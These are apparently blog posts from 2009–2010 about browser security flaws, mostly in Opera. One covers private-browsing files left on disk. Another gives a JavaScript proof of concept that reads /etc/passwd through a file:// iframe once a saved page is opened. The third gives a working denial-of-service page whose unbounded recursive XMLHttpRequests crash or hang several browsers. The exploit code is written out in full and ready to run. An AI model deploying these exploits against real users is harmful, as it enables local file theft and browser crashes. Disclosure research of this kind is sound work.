Showing posts with label opera. Show all posts

12/17/2010

Private browsing in Opera is not so private actually

I've always used Opera's private browsing when I didn't want history and other data saved locally. That is, until I decided to take a look at how private it really is.
After some private browsing I navigated to ~/.opera/temporary_downloads and noticed that Opera stores a few files it needs there. There were:
  • crossdomain.xml (which in many cases reveals the domain you browsed)
  • various swf files (which may reveal sensitive information when decompiled)
  • a strange video_related.htm file, which contained a lot of information
That alone would be fine, but the actual problem is that Opera doesn't delete these files when it closes. It only does so the next time it is started, and it behaves this way regardless of whether the session was private or normal. I doubt anyone starts Opera again just to clear the files after private browsing.
So, Opera's private browsing is not so private actually.

9/19/2010

Opera and access to file:// iframes


It's just a quick thought about getting the content of iframes with file:// sources. While Firefox and Chrome don't allow access to the contentWindow and contentDocument properties of iframes with file:// sources, Opera and Internet Explorer have no such restriction.
Access becomes possible when the file containing the iframe is itself saved locally. Opera and Internet Explorer then render the file:// iframe and, since the schemes match (which is all they require for contentWindow and contentDocument), allow reading it. (Firefox actually allows this too, but it additionally compares the file paths and throws a security exception if they differ.)
So we make the user save the web page locally (as an HTML file) and open it. IE, however, won't execute JavaScript in such a file by default. Opera still lets us do it.
Here is a proof-of-concept just for fun:

<body></body>
<script>
  // Frame a local file and read its DOM once it has finished loading.
  // Only works when this page itself was opened from file:// (matching scheme).
  var iframe = document.createElement('iframe');
  iframe.src = 'file://localhost/etc/passwd';
  iframe.onload = function () {
    var info = iframe.contentWindow.document.body.innerHTML;
    alert(info);
  };
  document.body.appendChild(iframe);
</script>

P.S. Wow, I don't really know what it means, but Safari launches Windows Explorer with the path of such iframes.

9/11/2009

IE 7.x/8.x, Opera 10.x, Safari 4.x DoS PoC

While playing around with cross-domain requests, I've noticed that a page containing a looping XmlHttpRequest disrupts the normal behavior of several browsers.
MS Internet Explorer 7.x/8.x (I don't have 6.x, but I'm sure it's affected) begins to devour system resources (CPU and memory), shows the error message "Stack Overflow at line: 43" and stops processing the page within a few seconds.
Opera 10.x crashes within a few seconds, and the crash may well lead to shellcode execution (I debugged it with WinDbg and !exploitable).
Apple Safari 4.x simply hangs, devouring system resources.
Mozilla Firefox 3.5 and Google Chrome, however, handle this exploit.
Vendors have been contacted, but there has been no reaction.
I posted this very dirty PoC at sla.ckers, and now it's here.
To test the PoC, create a page containing the exploit, put it on your local web server (any LAMP stack) or a website, and open it.
The PoC consists of a cross-browser XmlHttp factory (ActiveX on older IE, native XMLHttpRequest elsewhere), a synchronous request that calls itself again on every 404 without any bound, and one asynchronous request whose 404 starts that recursion. The unbounded recursion is what exhausts the stack.

<script>
  // Cross-browser XMLHttpRequest factory: ActiveX on older IE, native
  // XMLHttpRequest elsewhere; returns false if neither is available.
  function getXmlHttp() {
    var xmlhttp;
    try {
      xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    } catch (e) {
      try {
        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
      } catch (E) {
        xmlhttp = false;
      }
    }
    if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
      xmlhttp = new XMLHttpRequest();
    }
    return xmlhttp;
  }
</script>
<script>
  // Synchronous request for a page that does not exist; on the 404 it calls
  // itself again without any bound, so the stack grows until the browser fails.
  function getXmlHttpSploit() {
    var xmlhttp = getXmlHttp();
    xmlhttp.open('GET', 'nonexistentpage', false);
    xmlhttp.send(null);
    if (xmlhttp.status == 404) {
      getXmlHttpSploit();
    }
  }
</script>
<script>
  // Kick things off with one asynchronous request; its 404 starts the recursion.
  var xmlhttp = getXmlHttp();
  xmlhttp.open('GET', 'nonexistentpage', true);
  xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == 4) {
      if (xmlhttp.status == 404) {
        getXmlHttpSploit();
      }
    }
  };
  xmlhttp.send(null);
</script>